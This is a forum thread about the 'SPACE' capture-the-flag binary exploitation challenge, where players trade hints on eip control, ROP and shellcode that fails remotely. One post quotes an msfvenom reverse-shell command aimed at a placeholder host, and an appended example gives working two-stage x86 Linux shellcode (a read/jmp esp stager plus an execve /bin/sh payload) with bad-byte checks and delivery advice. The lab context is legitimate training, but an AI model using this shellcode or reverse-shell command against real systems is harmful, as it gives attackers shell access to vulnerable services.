SPACE [PWN]

Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens…

@Chainmanner said:

Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens…

There are multiple ways to solve this one; you need to explain more about what you have done.
It can be the execution environment, for example, or something else.

@Chainmanner said:

Would anybody be able to help me out a bit here? My shellcode works fine locally, but not on the remote service, and I have no clue what could be going wrong. Hate it when this happens…

This mainly happens due to some type of stack misalignment error. At least that is what I have faced in the past. But not much can be said without looking at the payload that you’re sending.

Hi, I’m stuck. I can overwrite $eip with any value, but it doesn’t give much of a result.
I can’t use ret2libc, because I don’t know the libc address.
Maybe I should focus on the PLT and GOT sections. I need a hint.
Tell me, what strategy should I follow?
Or write to me in a PM with a more detailed explanation.

thank you in advance!

Hi, I’m currently stuck. I do have some kind of control of eip, but the various things I tried either only work locally or don’t work at all. Could someone please give me a hint on how to proceed, or PM me for more details?
Thanks

Not “Very easy” but fun :)

Done with ROP. Can anybody PM me the intended way?

Edit: got it.

Finally managed to solve it. I guess it is the intended way, but I’m not sure about that. If someone can PM me regarding the ROP approach, that would be awesome.

@R4J said:

@Rembown said:

Was anyone able to do this without ropping? Seems it should be doable from looking at the mitigations on the binary

Yes, the intended way was without using ROP.

Hi, can I PM you regarding my solution, just to check if this was the intended way?
Best

EDIT: OK, after a mess I figured it out. I used to Sp**t my shellcode. Looking for someone to compare solutions with, to check whether I solved it the intended way.

My exploit only works in gdb. I’ve also turned off address randomization and unset the gdb env vars.
Can anybody give me a nudge on what I’m missing?

Did it, if someone needs help.

Hi! How can I create a small shellcode? The ones created by msfvenom are too large.
Thanks in advance

Done and dusted! That was fun!

I have split the shellcode into two separate parts. After lots of experimenting I got it to work in gdb. However, when running it outside of gdb, I get a segmentation fault. I think this is because the kernel pushes things like environment variables, params etc. onto the stack, and thus invalidates any hardcoded addresses in the exploit. Did anyone get around this?

If someone did it the way it was supposed to be done, please PM me. I need some help; I can’t understand how all the functions work together and how the stack works in this case. The variable in vuln is 10 bytes long, but 0x14 (20) bytes are allocated instead…

Could someone who has solved this challenge PM me? I need a nudge.

Hi everybody! I managed to solve the challenge in the intended way, at least I think it is. Could somebody PM me to discuss the solution or other alternative ones?

Please PM me with help for the reverse shell. I have something working locally. I think I solved the ‘space’ issue, but then I’ve tried adding on a payload like ‘msfvenom -p linux/x86/shell_reverse_tcp -f raw -b '\x00\x0a\x20' LHOST=MYIP LPORT=MYPORT -o msfpayload’ and it works locally but not remotely. I’ve made sure my firewall is open.

If anyone managed to solve it using ROP, please let me know (:

I have solved it with a two stage payload.
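Several posts above ask how to get a shellcode small enough for the buffer (the msfvenom one being too large), mention splitting it into two stages, and quote the bad bytes `\x00\x0a\x20` passed to msfvenom. The following is an added example, not code from the thread: it hand-encodes a 14-byte x86 Linux stager that calls read() and jumps to what it read, plus the classic 21-byte execve("/bin//sh") second stage, and checks both against that bad-byte set and against the sizes the thread mentions (a 0x14-byte buffer). The layout it assumes is mine, not stated by anyone in the thread: stage 1 is placed in the small stack buffer below the saved return address, so after the `ret` that reaches it, esp points above the running stager and the read() buffer does not overwrite it.

```python
"""Two-stage x86 Linux shellcode with a bad-byte check (added example).

Assumptions (not from the thread): 32-bit Linux, int 0x80 syscalls,
stage 1 lives in the overflowed buffer below the saved eip, so esp is
above the stager when it runs and read(0, esp, ...) cannot clobber it.
"""

# Bytes the remote input may not contain, taken from the msfvenom -b
# option quoted in the thread.
BAD_BYTES = frozenset(b"\x00\x0a\x20")

# Stage 1 (14 bytes): read(0, esp, 0x100); jmp esp
STAGE1 = bytes([
    0x31, 0xdb,        # xor ebx, ebx   ; fd = 0 (stdin / the socket)
    0xf7, 0xe3,        # mul ebx        ; eax = edx = 0
    0xb0, 0x03,        # mov al, 3      ; __NR_read
    0x89, 0xe1,        # mov ecx, esp   ; buf = esp (above the stager)
    0xb6, 0x01,        # mov dh, 1      ; count = 0x100, no NUL in the encoding
    0xcd, 0x80,        # int 0x80
    0xff, 0xe4,        # jmp esp        ; run what was just read
])
STAGE1_READ_SIZE = 0x100  # the edx value set by `mov dh, 1`

# Stage 2 (21 bytes): execve("/bin//sh", NULL, NULL)
STAGE2 = bytes([
    0x31, 0xc9,                    # xor ecx, ecx  ; argv = NULL
    0xf7, 0xe1,                    # mul ecx       ; eax = edx = 0, envp = NULL
    0x51,                          # push ecx      ; string terminator
    0x68, 0x2f, 0x2f, 0x73, 0x68,  # push "//sh"
    0x68, 0x2f, 0x62, 0x69, 0x6e,  # push "/bin"
    0x89, 0xe3,                    # mov ebx, esp  ; filename
    0xb0, 0x0b,                    # mov al, 11    ; __NR_execve
    0xcd, 0x80,                    # int 0x80
])

# The obvious `mov edx, 0x100` encodes as BA 00 01 00 00: three NUL bytes,
# which is why stage 1 zeroes edx with mul and sets dh instead.
NAIVE_MOV_EDX_0x100 = bytes([0xba, 0x00, 0x01, 0x00, 0x00])


def find_bad_bytes(payload: bytes, bad=BAD_BYTES) -> dict:
    """Return {offset: byte} for every forbidden byte in payload."""
    return {i: b for i, b in enumerate(payload) if b in bad}


def stage1_fits(buffer_len: int) -> bool:
    """True if the stager fits the buffer the overflow gives us."""
    return len(STAGE1) <= buffer_len


def build_stage1(buffer_len: int, pad: bytes = b"\x90") -> bytes:
    """Stage 1 padded with NOPs to exactly fill buffer_len bytes.

    The padding is never executed (jmp esp leaves before it); it only
    keeps whatever follows the buffer (saved ebp, saved eip) at the
    offsets the rest of the exploit expects.
    """
    if not stage1_fits(buffer_len):
        raise ValueError(f"stage 1 is {len(STAGE1)} bytes, buffer is {buffer_len}")
    payload = STAGE1 + pad * (buffer_len - len(STAGE1))
    bad = find_bad_bytes(payload)
    if bad:
        raise ValueError(f"bad bytes in stage 1 at offsets {sorted(bad)}")
    return payload


def build_stage2() -> bytes:
    """Stage 2, checked against the read() size stage 1 hands the kernel."""
    if len(STAGE2) > STAGE1_READ_SIZE:
        raise ValueError("stage 2 larger than the stage 1 read()")
    return STAGE2


def main() -> None:
    print("stage 1:", build_stage1(0x14).hex(), "bad:", find_bad_bytes(STAGE1))
    print("stage 2:", build_stage2().hex(), "bad:", find_bad_bytes(STAGE2))
    print("naive mov edx,0x100 bad offsets:", sorted(find_bad_bytes(NAIVE_MOV_EDX_0x100)))


if __name__ == "__main__":
    main()
```

Stage 2 arrives through the raw read() issued by stage 1, so it is not subject to whatever filtering the service applies to its normal input, but it is shown clean anyway. One caveat worth knowing when this works locally and not remotely: send stage 2 as a separate write after stage 1 has had a moment to run. If the target reads its input with a buffered stdio routine and both stages are sent in one packet, the trailing bytes can end up in the FILE buffer instead of being seen by the read(0, …) in the stager.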